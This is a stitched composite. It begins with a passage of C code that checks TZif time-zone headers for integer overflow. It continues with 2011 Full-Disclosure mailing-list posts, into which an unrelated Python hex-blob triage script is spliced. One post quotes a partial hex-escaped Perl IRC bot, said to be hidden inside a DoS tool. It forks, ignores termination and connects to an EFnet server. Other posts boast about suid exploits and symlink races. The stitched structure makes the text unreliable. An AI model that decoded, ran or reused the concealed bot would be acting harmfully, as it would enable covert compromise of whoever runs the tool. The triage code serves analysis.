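    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}
/* *acc += count * unit without wrapping around SIZE_MAX; 0 means it would. */
static int add_mul(size_t *acc, uint32_t count, size_t unit)
{
    size_t term;
    if (count != 0 && unit > SIZE_MAX / count) return 0;
    term = (size_t)count * unit;
    if (term > SIZE_MAX - *acc) return 0;
    *acc += term;
    return 1;
}

/* Validate a TZif header and the version-1 body size it implies. Returns 0
 * on success (counts and body size filled in); -1 too short, -2 bad magic,
 * -3 inconsistent counts, -4 size arithmetic wraps, -5 header promises more
 * bytes than the file holds. The sum is checked term by term, never trusted. */
int tzfile_check_header(const unsigned char *buf, size_t len,
                        struct tz_counts *c, size_t *body)
{
    size_t need = 0;
    if (len < TZ_HDR_LEN) return -1;
    if (memcmp(buf, TZ_MAGIC, 4) != 0) return -2;
    c->ttisgmtcnt = get_be32(buf + 20);
    c->ttisstdcnt = get_be32(buf + 24);
    c->leapcnt    = get_be32(buf + 28);
    c->timecnt    = get_be32(buf + 32);
    c->typecnt    = get_be32(buf + 36);
    c->charcnt    = get_be32(buf + 40);
    /* Every transition indexes a type; isstd/isgmt flags are one per type. */
    if (c->typecnt == 0 && c->timecnt != 0) return -3;
    if (c->ttisstdcnt > c->typecnt || c->ttisgmtcnt > c->typecnt) return -3;
    /* v1 body: 4-byte transition times, 1-byte type indices, 6-byte ttinfo
     * records, abbreviation chars, 8-byte leap records, isstd and isgmt bytes. */
    if (!add_mul(&need, c->timecnt, 4) || !add_mul(&need, c->timecnt, 1) ||
        !add_mul(&need, c->typecnt, 6) || !add_mul(&need, c->charcnt, 1) ||
        !add_mul(&need, c->leapcnt, 8) || !add_mul(&need, c->ttisstdcnt, 1) ||
        !add_mul(&need, c->ttisgmtcnt, 1))
        return -4;
    if (need > len - TZ_HDR_LEN) return -5;
    *body = need;
    return 0;
}

/* Constructed test header (not a real zone file): only the three counts that
 * matter here are set, everything else is zero. */
void tz_make_header(unsigned char *buf, uint32_t timecnt, uint32_t typecnt,
                    uint32_t charcnt)
{
    memset(buf, 0, TZ_HDR_LEN);
    memcpy(buf, TZ_MAGIC, 4);
    put_be32(buf + 32, timecnt);
    put_be32(buf + 36, typecnt);
    put_be32(buf + 40, charcnt);
}

/* Minimal well-formed file: one transition, one type, a 4-byte abbreviation,
 * so the body is 4+1+6+4 = 15 bytes. Returns that body size, -1 on rejection. */
long demo_benign(void)
{
    unsigned char file[TZ_HDR_LEN + 15];
    struct tz_counts c; size_t body;
    memset(file, 0, sizeof file);
    tz_make_header(file, 1, 1, 4);
    if (tzfile_check_header(file, sizeof file, &c, &body) != 0) return -1;
    return (long)body;
}

/* The thread's crafted counts: 500 transitions and a charcnt equal to the
 * negation of the 32-bit total the posted code computes (assuming an 8-byte
 * time_t and 8-byte ttinfo alignment), so a naive uint32_t sum wraps to
 * almost nothing. Returns the validator's verdict for the given typecnt. */
int demo_crafted(uint32_t typecnt)
{
    unsigned char file[8192];   /* generous padding so only the counts matter */
    struct tz_counts c; size_t body;
    uint32_t total32 = (500u * 9u + 7u) & ~7u;
    memset(file, 0, sizeof file);
    tz_make_header(file, 500, typecnt, 0u - total32);
    return tzfile_check_header(file, sizeof file, &c, &body);
}
```

With typecnt left at zero as in the posted header the counts are rejected as inconsistent (-3); with typecnt set to 1 the charcnt alone exceeds the file and the header is rejected for promising more data than is present (-5).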


Re: [Full-disclosure] PenTest mag

2011-12-07 Thread GloW - XD
Well, it does force a registration, even for the teasers, that's rude,
but yes, it does have a teaser for each issue.. still, is FD the place
for these things, I don't know..


On 8 December 2011 07:51, Gage Bystrom themadichi...@gmail.com wrote:
 I didn't actually bother to get the teaser but I have to ask, was the free
 content in the teaser 23 pages?

 If it is, then they weren't misleading in the email. Otherwise, they are
 being rude.

 On Dec 7, 2011 12:46 PM, xD 0x41 sec...@gmail.com wrote:

 umm, it's not misleading at all.. this is the first look and, I
 understood well, if you bother to visit the address... they're
 'teasers' so, you don't get a FULL magazine or, kit, you only get the
 first like chapter/pages, that's similar to many other *products*, not
 freebies...


 On 8 December 2011 07:45, Dave m...@propergander.org.uk wrote:
 
  On 07/12/2011 10:02, Olga Głowala wrote:
  New issue of PenTest StarterKit is out!
 
  23 pages of free content, feat. Gabriel Marcos - When computer Attacks
 
  The link to download is below:
  http://pentestmag.com/pentest-starterkit-211-2/
  http://pentestmag.com/client-side-exploits-pentest-082011/
  Just scroll down and click download for free!
 
 
 
  Quote:
 
  Follow the steps below to download the magazine:
 
     Register, accept the Disclaimer and choose subscription option.
     Attention!
     By choosing the Free Account option you will only be able to download
  the teaser of each issue.
     Verify your account using the verification link sent to your email
  address.
     Check the password sent on your email address and use it to log in.
     Click the download button to get the issue.
 
 
  It isn't free.
  For the price of an email address one can get a teaser of the full 23
  page content.
  It costs at least $220.40 for full copy.
 
 
  Your post is misleading to say the least.
 
 
 





Re: [Full-disclosure] Large password list

2011-12-02 Thread GloW - XD
Very true... most hashes like 'lol' and such are usually around,
12345 is, all the main weak ones are google'able...
I do like people like openwall.com, BUT, they do A. contribute BACK to
the community through Owl Linux, and, provide lists free, you can
optionally buy 700 megs for about 20 bux, I know I did buy their CD, so
I'm guilty of supporting OwlOS, and though, we are also speaking 700 megs,
and access to gigabytes of lists here... 4 bux for 20 megs is a joke :P



On 3 December 2011 06:14, Jeffrey Walton noloa...@gmail.com wrote:
 On Thu, Dec 1, 2011 at 10:59 PM, Sanguinarious Rose
 sanguiner...@occultusterra.com wrote:
 I am at a lack of words for this, why pay $4.99 when you can just do
 some simple googling? You can even search pastebin and get a mass
 collection of password lists from dbases. Add a dash of awk and maybe
 a pinch of sed and voilà!

 Why even spend the CPU cycles to process the password list? See Jon
 Callas' post on the Random Bits mailing list: No one bothers cracking
 the crypto (real life edition),
 http://lists.randombit.net/pipermail/cryptography/2011-December/001870.html.

 Interestingly (sadly?), googling the hash worked quite well for me on
 a number of test cases, including common words and proper names.

 Jeff




Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-19 Thread GloW - XD
dude, you have GOT to be kidding.
I can exploit Ubuntu 2011 server and client about 10 ways, and
probably same with half this list, it is INDEED entry level, or, just
stop handing it out on magazines with "how to use ubuntu! Move to
easy linux now!" promos, and then your words have merit.



On 19 November 2011 18:14, root ro...@fibertel.com.ar wrote:
 On 11/18/2011 11:01 AM, Darren Martyn wrote:
 To be honest, while Ubuntu is hardly secure, it is not DESIGNED to be
 secure per se. It is designed to wean Windows users away from M$ and toward
 GNU/Linux OS types. Kind of a Linux for newbs. My family went from Win XP
 to Ubuntu years ago and stuck with it. I moved on to Debian, they stuck to
 Ubuntu and Win7 (eventually) as they are not computer enthusiasts - mere
 users.

 Bullshit, Ubuntu is designed (or at least, was designed) to be very
 secure, check all the stuff it comes by default:

 https://wiki.ubuntu.com/Security/Features

 Not even the default Debian kernel has all those features activated. If
 I'm wrong, why do you see metasploit modules for Debian but not for Ubuntu?
 that's the reason.

 Recently some stupid people got into management (as always happens) and
 we have things like unity, the fucked up 24-bit ASLR in i386, and this
 guest account for retards.






Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-19 Thread GloW - XD
Recently some stupid people got into management (as always happens)

Oh here you're right, but you still can relent, just don't fucking use
the OS which sucks, I have learnt that this usually dictates how an OS
gets put together... or no, take some lessons out of Windows
even, but do it smarter... idc, I'd never put Ubuntu on a prod OR
local box, it got me once with the APC mags promo about how cl ubu
is, then I found there are only about 100 bad binaries, you're almost
there now, only 30 or so to go! almost patched dude! The biggest laugh
is, your main binary which is simplest, is vulnerable to suid attack...
I guess some people would know this method, and know what I am talking
about.. if not bad luck.


Now, adding in a known MS flawed user... well, what's stopping it from
taking out lamest fucking OS of year award... nothing. Clean
management, and clean your 3rd party addons, then I'll maybe consider
even using it partially again.
It sucks, simple, gimme user ax to your Ubuntu, so I can rape it. thx :)





On 19 November 2011 18:14, root ro...@fibertel.com.ar wrote:
 On 11/18/2011 11:01 AM, Darren Martyn wrote:
 To be honest, while Ubuntu is hardly secure, it is not DESIGNED to be
 secure per se. It is designed to wean Windows users away from M$ and toward
 GNU/Linux OS types. Kind of a Linux for newbs. My family went from Win XP
 to Ubuntu years ago and stuck with it. I moved on to Debian, they stuck to
 Ubuntu and Win7 (eventually) as they are not computer enthusiasts - mere
 users.

 Bullshit, Ubuntu is designed (or at least, was designed) to be very
 secure, check all the stuff it comes by default:

 https://wiki.ubuntu.com/Security/Features

 Not even the default Debian kernel has all those features activated. If
 I'm wrong, why do you see metasploit modules for Debian but not for Ubuntu?
 that's the reason.

 Recently some stupid people got into management (as always happens) and
 we have things like unity, the fucked up 24-bit ASLR in i386, and this
 guest account for retards.






Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-19 Thread GloW - XD
very good question, when I have seen bugs in sudo, which allow me to
gain root, using sudo su - , which is a feature but, if not protected
and you have a bad sudo binary (the sudo -g bug was about the time I did
tests with the amazon sudo) .. I asked a friend also to do this test
and he also gained root through a non sudo account, because BOTH binaries
are there I am still baffled with this, I try avoid sudo where I
can and, because sudo -g bug was nasty, I try use su - , which is a bit
better I *think*, but very good question,... I'd like to know the
reasons why too..



On 20 November 2011 06:36, Dan Kaminsky d...@doxpara.com wrote:
 What is the security differential between su and sudo bash?

 Sent from my iPhone

 On Nov 19, 2011, at 6:15 AM, ja...@zero-internet.org.uk wrote:

 I'll second that; the isp I work at has a sizeable ubuntu customer base and 
 these are customers who have made an informed decision.

 Now; let's consider ubuntu's inherited security from debian such as 
 configuring a 'mortal account' (admittedly can be ignored in the preseed) 
 and then the lack of perms on su; must use sudo.

 This is a distro that is newbie friendly but is not designed specifically 
 for them.

 Unfortunately, though, you make a distro with simplified tasks (printer 
 installation a fantastic example) and people, especially long term linuxers- 
 though I ought to be included I guess, remember back all too easily to when 
 everything was an uphill struggle: what do you mean I don't have to compile 
 this as a flipping module? That's not freedom! Being all too familiar.

 Just my tuppence worth anyway.

 Sent from my BlackBerry® wireless device

 -Original Message-
 From: Johan Nestaas johannest...@gmail.com
 Sender: full-disclosure-boun...@lists.grok.org.uk
 Date: Fri, 18 Nov 2011 12:04:46
 To: Olivierfeui...@bibibox.fr
 Cc: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default





Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default

2011-11-18 Thread GloW - XD
yea, I'd also like to see how on earth Valdis calls this some kinda new
'root' problem... I don't see any problem with this, especially on THIS
type of system.. intended to teach people how to use Linux.


On 19 November 2011 06:32, Olivier feui...@bibibox.fr wrote:
 On 11/18/2011 03:10 PM, Dan Kaminsky wrote:


 On Fri, Nov 18, 2011 at 5:01 AM, valdis.kletni...@vt.edu
 mailto:valdis.kletni...@vt.edu wrote:

     On Thu, 17 Nov 2011 15:53:41 CST, C de-Avillez said:

      There is no guest account on an Ubuntu server, so at least there
      this is not a real/perceived risk.

     And nobody's *ever* installed the desktop version on a server
     because they didn't know any better, especially from Ubuntu's
     target audience.  Gotcha. ;)


 OK, seriously.  If you're sitting in front of a machine that's
 presenting you a login prompt, you've got enough privileges to insert a
 bootable USB/CD and pull all the data / make yourself an account
 (FDE/Bios PW notwithstanding).

 My disk is password protected, and the whole system (except /boot) is
 encrypted. Ubuntu guest account is definitely the best way to hack a
 running laptop (or workstation).

 --
 Olivier



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Secunia jumps on vuln reward bandwagon

2011-11-03 Thread GloW - XD
Well, no comment, or comment, it's hard to comment on this one :P
Although, I will say it is good and encouraging to see more security
teams at least offering *something*
:)
love the list...oh yea baby oh yea


On 4 November 2011 01:25, Georgi Guninski gunin...@guninski.com wrote:
 http://www.theregister.co.uk/2011/11/02/secunia_vulnerability_rewards/
 Secunia jumps on vuln reward bandwagon

 have in mind the list is Hosted and sponsored by Secunia

 --
 j



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [foofus-tools] discontinued?

2011-10-27 Thread GloW - XD
naw we fuckin hate windows it sucks.


On 27 October 2011 19:20, Kristen Eisenberg kristen.eisenb...@yahoo.com wrote:
 Hi guys, well first of all thanx for building a tool like fgdump :)
 but i'm worried, since 2k8 there is no update and it would be very sad
 if it's discontinued... are you planning another release?
 Kristen Eisenberg
 Billige Flüge
 Marketing GmbH
 Emanuelstr. 3,
 10317 Berlin
 Deutschland
 Telefon: +49 (33)
 5310967
 Email:
 utebachmeier at
 gmail.com
 Site:
 http://flug.airego.de - Billige Flüge vergleichen
 ___
 foofus-tools mailing list
 foofus-to...@lists.foofus.net
 http://lists.foofus.net/listinfo.cgi/foofus-tools-foofus.net



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread GloW - XD
Yes... even adding a cron entry is possible if done right ;)


On 28 October 2011 04:51,  valdis.kletni...@vt.edu wrote:
 On Thu, 27 Oct 2011 10:31:12 PDT, Andrew Farmer said:
 And systems like inotify make filesystem races trivial to win. I
 wouldn't be surprised if you could win this particular race reliably by
 watching for the files bzexe drops and acting immediately when they show
 up.

 Good point.  That actually has multiple benefits - first off, you don't have a
 'while (1)' loop in your code that's easily spotted on a 'ps' or 'top'.  So you
 can afford to set the inotify and wait (potentially days, if needed) with less
 chance of detection.  And then when the inotify pops and tells you your file is
 ready to be exploited, the circumstances of returning from the blocked syscall
 will tend to give your process a scheduling boost, improving your chances of
 winning the race because you'll schedule soon.

 It's amazing how many optimizations people are coming up with for a vulnerability
 that some were saying is impossible to exploit. ;)




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread GloW - XD
Ok... am awake now and, have some infos yes...
Interesting bot.
Seems I have spoken with some people regarding this and the release. Here is
a brief outline of how it goes.
Attacks were done on some people who run shells on the EFnet IRC network, so in
order to catch the *morons* or, ppl who did launch the DoS,
would then be showing up in the #darknet channel, and responds to the ops or,
channel.
I ran this and saw it still clobbers SMB, and still uses the original bug, so
DoS will still occur,
however, it will try and join, I believe that's a dead link in there now but,
would have tried to join an EFnet node..
Speaking with #darknet owners:

 ok dude why was this released...
msg we released the original working code. this started a massive war of
the kids,
unfortunately many innocent boxes got raped, so we decided to play a small
game, and make a *version plus*
or so to say.
 very interesting concept, new, intuitive to use perl, as many people would
decrypt it tho, using perl -e , isn't this a little harsh...
msg they run it, it won't affect them, at all, they will see the connection
and kill it, and since no DoS is launched, it won't really work
 hrmm well, it is a good idea, to capture the arseholes who wish to ddos
etc... i see why it is done but also, can i ask you
  do you know what a darknet is ? because, you seem to not see that, ppl
would assume this channel is all about 'darknets'..
 instead it is only capturing people who will launch a DoS tool, and many
people seem 'idle'.
msg we don't control who comes here, nor care, but when it comes to DoS, we
don't screw about. hit us, and we will hit back.
Also, why are you asking me about code which was made in 2003 or so :P~
 ahh well, that's purely because, i expose any BS like this code is, but, i
will not mark this as bullshit.
  it is horseshit :P and, i respect that you're at the least, using some
shitty tool like DoS, instead of faking an exploit.
  I will class this not as exposed at all, instead, it will serve as some
form of tuition to skids.
  Run the tools you cannot read, and, expect even some shitty perlbot to pop
out. I like it!
  I will class this as exposed but intuitive, thank you for your time.
msg i don't care what you mark it as, the rule is simple, do not run DoS
./appz ! Have a nice day!
 Again thanks for your time, i will keep the nickname anonymous... you're not
classed as a now-owner , so i guess it is more wtf this was all about, even
when you wrote the .c or, as i know it,
   was 'brain' or some dude... either way, i tip the black hat to you but
also warn you not always will them kids be happy to be owned by shitty .c ,
so, i'd be expecting more problems from release, than not
   This is your problem, and, i respect your views, just get some knowledge
into you about wtf a 'darknet' is pronto!
   Also have a nice day.

..
Ok so, basically the talk I had with a now non-op of the channel but,
interesting coz, it is actually very popular, yet only a few actually
realise that they're being linked now to a darknet technology app etc, and
they're finding that maybe they should have kept those old ops :P or maybe
they could just release 'ipv6killer.c' and just fix some
settings.. either way, it is kinda unique, and strange why there was no chat
about this app, until now.. nothing
solid which shows this perl, and admittedly, that's a VERY clever bot for such
a small piece of code.
Anyhow, thanks to those who found this interesting, sorry to those who didn't
:)
I think I might hang in the darknet channel and wait for a few "Hi im a lamer!"
etc... rofl.
cheers, and cheers to #darknet for at least not faking the tool completely,
and, using a skeleton and structure of their OWN code.
Winnuke2000.c is NOT backdoored, and IS theirs also, I think they regret
releasing it now but, this was 2003, and, as I said, I will try and expose
anything I find strange, however, from now on, I'll be marking exposes under
noise, as they're non disclosures.
xd




On 26 October 2011 16:55, Flavio do Carmo Junior carmo.fla...@gmail.com wrote:

 sounds really useful...

 [waKKu@1215n ~]$ python -c 'hellcode=(
 \x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63
 \x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69
 \x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72
 \x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e
 \x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65
 \x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f
 \x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49
 \x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e
 \x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22
 \x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63
 \x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d
 
 

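Reading a blob like the one quoted above without running it, as an added example that is not part of the thread or of anyone's tool: the decoder picks the \xNN tokens out of mail-wrapped, quoted text (blank lines and indentation are ignored) and the triage step reports the interpreter named in the shebang, whether the result is plain text, and which generic indicator strings (IRC handshake, socket use, fork-and-exit, signal handler tampering, shell execution) it contains. The indicator list is a generic one chosen for this example, and the sample script, host name and channel in it are constructed placeholders, not the posted bot.

```python
"""Static triage of a hex-escaped script blob, without executing it.

Mail clients wrap and mangle long '\\xNN' strings, so the decoder first
collects every \\xNN token it can find and ignores whatever whitespace or
line breaks sit between them.  The sample blob below is constructed for
this example; it is not the bot posted in the thread.
"""
import re
from typing import Dict, List

HEX_TOKEN = re.compile(r"\\x([0-9a-fA-F]{2})")

# Strings that, in a decoded script, point at behaviour worth a closer look.
# Generic indicators chosen for this example, not a signature for any tool.
INDICATORS: Dict[str, List[bytes]] = {
    "irc_protocol": [b"USER ", b"NICK ", b"JOIN ", b"PRIVMSG "],
    "network_socket": [b"IO::Socket", b"import socket", b"socket("],
    "daemonize": [b"exit if fork", b"fork()", b"setsid"],
    "signal_tampering": [b"$SIG{", b"signal.signal"],
    "remote_exec": [b"system(", b"exec(", b"`"],
}


def hex_escape(data: bytes, width: int = 18) -> str:
    """Encode bytes as lines of \\xNN tokens, laid out the way the blob in
    the thread is (about 18 bytes per wrapped line)."""
    tokens = ["\\x%02x" % b for b in data]
    lines = ["".join(tokens[i:i + width]) for i in range(0, len(tokens), width)]
    return "\n".join(lines)


def decode_hex_escapes(text: str) -> bytes:
    """Recover the raw bytes from a wrapped \\xNN blob.

    Only \\xNN tokens are consumed; blank lines, quote markers, indentation
    and the surrounding python -c 'hellcode=(' wrapper are skipped."""
    return bytes(int(h, 16) for h in HEX_TOKEN.findall(text))


def triage(payload: bytes) -> Dict[str, object]:
    """Describe what a decoded blob is, so it can be read before it is run."""
    interpreter = None
    if payload.startswith(b"#!"):
        first_line = payload.split(b"\n", 1)[0]
        interpreter = first_line[2:].strip().decode("ascii", "replace")
    printable = sum(1 for b in payload if 32 <= b < 127 or b in (9, 10, 13))
    hits = {name: [s.decode() for s in needles if s in payload]
            for name, needles in INDICATORS.items()}
    hits = {k: v for k, v in hits.items() if v}
    return {
        "length": len(payload),
        "interpreter": interpreter,
        "is_text": printable == len(payload),
        "indicators": hits,
    }


# Constructed sample: a tiny Perl script with the shape of an IRC bot
# (shebang, fork-and-exit, socket to a placeholder host, IRC handshake).
# The host and channel are placeholders, not real infrastructure.
SAMPLE_SCRIPT = (
    b"#!/usr/bin/perl\n"
    b'$chan="#example";$nick="bot";$server="irc.example.invalid";'
    b"$SIG{TERM}={};exit if fork;use IO::Socket;"
    b'$sock=IO::Socket::INET->new($server.":6667")||exit;'
    b'print $sock "USER bot +i bot :bot\\nNICK bot\\n";\n'
)

# What the blob looks like once it has passed through a mail client:
# quoted, wrapped, and with blank lines between the wrapped pieces.
MAILED_BLOB = (
    " [user@host ~]$ python -c 'hellcode=(\n"
    + "\n\n".join(" " + line for line in hex_escape(SAMPLE_SCRIPT).splitlines())
    + "\n"
)


if __name__ == "__main__":
    recovered = decode_hex_escapes(MAILED_BLOB)
    print(recovered.decode())
    print(triage(recovered))
```

The point of the triage dictionary is that a reader who sees `interpreter: /usr/bin/perl` plus `irc_protocol`, `daemonize` and `network_socket` hits knows what a "hellcode" blob will do before deciding whether to go any further with it.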
Re: [Full-disclosure] Security risks in public APIs?

2011-10-26 Thread GloW - XD
My own thoughts are, as long as FaceBook continues to live, there will always
be that million people who will not bother to worry, because after all, it's
not their website, so, why even bother to use a secure API... if you know
your security enough then, it is a well known target for any attack and will
continue to be attacked as long as it stays big, it is a source of easily
gotten robots through spam and yes, bad links etc within facebook.
I know with myspace, it was nonstop worms and these worms were darn good,
using trick flash plugin exact pages to do their bidding to view a friend's
page. This kind of attacking and attacks will always happen, so, the
security info is great for some but, really if you keep things *small* and
monitor who you add to the list of friends, you should never be *owned* ,
then again, there will always exist the better social engineers.
I will conclude by saying, I don't have any facebook account, I have only
monitored what I have watched happen, over and over it seems with facebook,
and it continues to have undisclosed bugs in the app, so, I don't think any use
of it is secure, certainly not for minors, certainly not if you're on some
production box and using it either.. that'd be silly.
my own thoughts and my own opinions, as you asked for.
This little birdy says NO to FB :-(
xdab



On 27 October 2011 08:42, Adam Behnke a...@infosecinstitute.com wrote:

 Hello full disclosurites, what do you think about security in public APIs?

 Dan Morrill here at InfoSec Institute writes about how to insecurely and
 securely use APIs in the Facebook SDK:

 http://resources.infosecinstitute.com/api-security/

 Your thoughts?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bypassing Windows 7 kernel ASLR

2011-10-11 Thread GloW - XD
That's cool... I'd like to see more about using ROP chains or other methods to
bypass DEP+ASLR in one go... rather than just take out one protection..
pretty nice read.. cheers
xd


2011/10/12 Stéfan LE BERRE slebe...@nes.fr

 Hi !

 I have recently discovered a method to bypass Windows 7 kernel ASLR.

 You can find the paper here:
 http://www.nes.fr/docs/NES-BypassWin7KernelAslr.pdf

 In this paper I explain every step to code an exploit with a useful kernel
 ASLR bypassing. I perform successful exploitations on Windows 7 SP0 / SP1.

 Good reading,

 Best regards,

 LE BERRE Stefan.

 IT Security Researcher

 NES http://www.nes.fr – http://ww.nes.fr/securitylab/

 46 rue de provence

 75009 PARIS



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wipe off, rub out, reappear...

2011-10-10 Thread GloW - XD
Oh, whoever has made this .exe is NO idiot...
I can already see that for this bug to be re-adding itself, there must be
active servers obviously, which would have the bots connected for command,
dumping of infos to other channels by using say
!pstore get *rover-*|grep *mars*transmission-request-FIN* -o #roverlogging
This is possible.. using just an if/else logic system (as seen in
Forbot/phatbot, and a few underground ones like stuxnet...)
xd



On 11 October 2011 10:41, Dave m...@propergander.org.uk wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 On 10/10/2011 23:52, xD 0x41 wrote:
  I will say, with Botnets, and bots in general, i dont see much talented
  people on FD...

 It might just be a case of those with the least talent making the most
 noise, whilst the really talented remain pretty quiet.

 Please discuss ;-)


  although, seems many can decrypt them, so, makes me wonder ,
  it is a train-of-thought also, i guess this is where hat colors take
  control.. black hats would say, go read some bot src and wake up FD, while
  white hats would say, but we can just kill it anyhow...' oh, we decrypted
  it... etc...
  another pointless neverending argument..


 As for this story I would expect such systems to be engineered and
 administered by someone with a clue even if the operators know no more than
 what buttons to press.

  On 11 October 2011 07:22, Daniel Sichel dani...@ponderosatel.com
 wrote:
 
  Somebody posted the following;
 
  I'm just curious to these questions. It's strange to hear someone
  saying we basically have no idea what's going on.
 
 
  Doesn't sound funny to me, happens to me all the time. That's how I
  learn.
 
  Dan S.
 

 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.2 (MingW32)
 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

 iQEVAwUBTpOCkLIvn8UFHWSmAQKEgQf+L9Cvl2sdHvw6EFhIruKd5ZPmJ9woGolB
 LX/hdWsPKuYFGYiiPthKTs4M/m6HTEY1fSc4KRWncpgcvCQ4iNvCE2UWDSvyrvmm
 3x0J2/OjndBoAWd4gI+QaELXiwaaWMAtTQwKQPPCzIP1DEvYDMY76Ml9ga5uO0Ew
 haoMYjQS/K+Bd6jTRDO9bzJHtKQWP+06jFr/FrX4+AtBHbSM9vqJ57JQjbo9U8H6
 Bdkoxtc8E3njPHasmO2UF96FyIE5OW42F8xpu0gi07uOwWKAreGB9UEJx0prVkwi
 BZruBLv5NunJw5wp28DkvKRfPgfRp697TYje1IuyNlgpwKX3nI2oXA==
 =SCl5
 -END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread GloW - XD
Ok, that's plain scary.
I was told of google 'tracking' any popular thread they see in their engine
or google words so I am assuming that, they have some very strong
filters set for FD for things like, talking about their own system of
cache in google (yet another little test..).
Still rather worrying, as this was only *rumored* before. Now it seems this
is for real, and, that would be a massive infringement of human rights in
general actually.
I am shocked but, then again, understand google control a lot of the
internet, so it is no wonder but, also a bit of a worry if the trend
continues so fast as it is.
I have already removed the post, or rather modified it, and now, will also
remove the other page but, I guess people don't realise, all those wapps, are
free in ms, and vs6 ok, was my bad for keeping a personal backup, is not
linked to one website I have never put them things up for others, and only
recent for the website itself.
However, the vcredist2005, could work same place as it.. I also renamed it
back to how it was, and should have been from the start... which is simple,
how to setup a VS6 setup which is nice to run with, and runs fine still with
newer versions.
All I did was, remove the original authors links, replaced with .rar and
.tar and bingo, some ppl just thought 'warez' .
It's kinda sad so many sniped at that, or rather, swiped.. when there are cc
fraudsters, I would much rather see go down. and much much worse 'hack'
sites, or 'bot' sites. I did an experiment, it worked, it was interesting.
Now, it is done.
thank you for those who participated in a good way, it was very interesting to
learn a lot of this like even this recent google cache thing.
I wonder just how much we are tracked by google. They are after all, huge and
then, they are also owned by M$.
cheers Valdis,
xd


On 3 October 2011 17:17, valdis.kletni...@vt.edu wrote:

 On Mon, 03 Oct 2011 12:25:31 +1100, GloW - XD said:

  sheesh, have they already cached it :s hrm... lol...well, that was VERY fast
  then, considering i linked to it only a cpl days ago :s from the files, and

 I have on occasion posted to F-D during an ongoing thread, and then Googled for
 more info on the thread, and discovered that Google had already indexed
 my posting and parked it on the first page of results before I even receive my
 own copy back from the server.

 As for your posting:

 http://www.google.com/search?sourceid=mozclient&scoring=d&ie=utf-8&oe=utf-8&q=%22sheesh%2C+have+they+already+cached+it+%3As+hrm.%22

 I see 3 hits already for the string "sheesh have they already cached it" as
 contained in 3 different archives of this list.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-03 Thread GloW - XD
if you allow the small fishes to play, they will grow big.
rubbish.
Complete rubbish.
That's a very broad spectrum of people here, and while I may not seem
whitehat at all, and am no hat really, I try to remain neutral, and, that guy,
decided to show me he was attacking me and, accusing, for things I simply
have not done, which, is a lot like what you are trying to do.
I have been in IT sec for years, and never once committed any kind of
fraud. How pathetic would that be, if my own business was to flunk, because
of say, cc fraud.. which, I have personally experienced, and would not wish on
my enemies.
So please take the socialist theories elsewhere.

PS: In real life, they go after the fishes who make them lose money, not
small nor big, it is VICTIM impact.
always will be. And until there are firm enough laws, this will not change.
Why would they chase me, even, for one pirated iso, not even pirated, a copy
of an original I believe. the rest is pure freeware, from ms, I just removed
the links purposely, but have them safely tucked here.
So, who is silly for assuming that, I am low level at best with piracy not
even a pirate, it was a backup, which I used as experimental material in the
end..
Your socialist views, probably show where you are from, or shine through
that customs, while we in the real world, tend to believe in the 'law'. ;-)
rofl... you make me laff.
have a good read party boi.
xd



On 3 October 2011 18:44, Ferenc Kovacs tyr...@gmail.com wrote:

  i assume, there is way more credit-fraud and rape etc going on, than
